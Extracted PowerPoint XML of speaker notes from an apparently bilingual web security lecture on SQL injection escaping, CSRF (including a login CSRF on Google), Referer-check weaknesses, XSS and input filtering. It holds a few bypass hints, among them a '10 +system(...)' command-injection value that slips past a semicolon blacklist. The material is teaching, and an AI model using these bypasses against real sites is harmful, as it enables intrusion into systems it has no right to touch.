        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15667596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03E514-1BC3-4CDD-8A10-6C1AF9A233ED}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>22</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1307650" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1307651" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Escapes with \.     ‘ -&gt; \’   .     DB independent  ---  different DB’s have different rules for escaping.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>snipet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is in C#</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="84689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Escaping is tricky:    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>addslashes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>  can reintroduce SQL injection vulnerability</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{7765A005-811F-4974-8202-6CEA404E2468}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>23</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17359327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Theme </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>主体</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="灯片编号占位符 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{55158CBF-4121-4F92-9E38-E421BCEB0D60}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>25</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3239626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4371387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8947324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err="1">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>Iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>内嵌框架</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="灯片编号占位符 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{55158CBF-4121-4F92-9E38-E421BCEB0D60}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>31</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2577194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4</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1021495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a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="135171" name="Notes Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="135172" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="965276"/>
            <a:fld id="{FECA9C15-561B-4BB1-94F5-81AFD468D0EE}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:pPr defTabSz="965276"/>
              <a:t>32</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17747559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158CBF-4121-4F92-9E38-E421BCEB0D60}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>33</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="290141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915664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如果采用宽松的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>Referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>验证策略，网站就应该阻止</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>Referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>值不对的请求。如果请求里面没有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>Referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，就接收请求。尽管这个方法用的很普遍，但是它很容易被绕过。因为攻击者可以在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>header</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>里面去掉</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>Referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>。例如，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>FTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>和数据</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>发起的请求里面就不包含</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>Referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>。 如果使用严格的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>Referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>验证策略，网站还要阻止没有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>Referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的请求。这样做主要是为了防止恶意网站主动隐藏</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>Referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，但也会带来兼容性 问题，比如会误杀一部分合法的请求，因为有些浏览器和网络的设置默认就是不含有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>Referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="灯片编号占位符 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{55158CBF-4121-4F92-9E38-E421BCEB0D60}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>37</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5310928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552193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 name="Shape 20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7517147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p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Event trace diagram for a login CSRF attack. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The victim visits the attacker’s site, and the attacker forges a cross-site request to Google’s login form, causing the victim to be logged into Google as the attacker.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Later, the victim makes a web search, which is logged in the attacker’s search history.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7994425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XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>攻击又称为跨站脚本</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="灯片编号占位符 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{55158CBF-4121-4F92-9E38-E421BCEB0D60}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>48</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="27058367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5158CBF-4121-4F92-9E38-E421BCEB0D60}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>57</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="29027889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GB" dirty="0"/>
              <a:t>Many websites take input from the user,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>conduct some activities and then send response to the user in a web page, with the original user input included on the response (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>i.e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> the user input is reflected back)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1136547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head -n 100  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>表示在查询结果中再查前</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>100</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>条记录</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="灯片编号占位符 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{55158CBF-4121-4F92-9E38-E421BCEB0D60}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>6</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22609176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dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18939944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dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16823577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312423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dirty="0"/>
              <a:t>Web defacing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>污损 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>DOM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>节点是指在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>XML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>文档中的每个成分都是一个节点 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Spoofing requests </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>欺骗请求</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12616171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3302021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8847808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Shape 2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8" name="Shape 20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554043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679944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1" name="Shape 22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r>
              <a:rPr lang="en-GB" sz="1200" u="sng" dirty="0"/>
              <a:t>Line </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" u="sng" dirty="0">
                <a:latin typeface="Arial Unicode MS" panose="020B0604020202020204" pitchFamily="34" charset="-128"/>
                <a:ea typeface="Arial Unicode MS" panose="020B0604020202020204" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Arial Unicode MS" panose="020B0604020202020204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>②</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" u="sng" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0"/>
              <a:t>We split the string into two parts and use “+” to concatenate them together. If we directly put the entire string, Firefox’s HTML parser will consider the string as a closing tag of the script block and the rest of the code will be ignored.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="660081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0" name="Shape 24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982309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a:t>白名单：只允许数字，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>， </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，*，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>/ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>出现在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>in</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>中</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>黑名单：不允许</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>“;”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>出现在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> $ in</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>中，但攻击者可以用“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>10 +system(...)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>”</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{7765A005-811F-4974-8202-6CEA404E2468}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>7</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="674080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9" name="Shape 24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765479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5" name="Shape 25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dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2876335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cross-site scripting (XSS), which exploits the trust a user has for a particular site, CSRF exploits the trust that a site has in a user's browser.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{55158CBF-4121-4F92-9E38-E421BCEB0D60}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>76</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="915179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C5CEFCB-E197-4C11-8A46-851C02279434}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>10</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1382402" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1382403" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="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solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>错误的方式</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1202374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0262B3FC-2135-4E26-9C94-50F8F1639012}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>12</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="80899" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1258888" y="720725"/>
            <a:ext cx="4800600" cy="3600450"/>
          </a:xfrm>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="80900" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="731844" y="4559928"/>
            <a:ext cx="5851514" cy="4320861"/>
          </a:xfrm>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
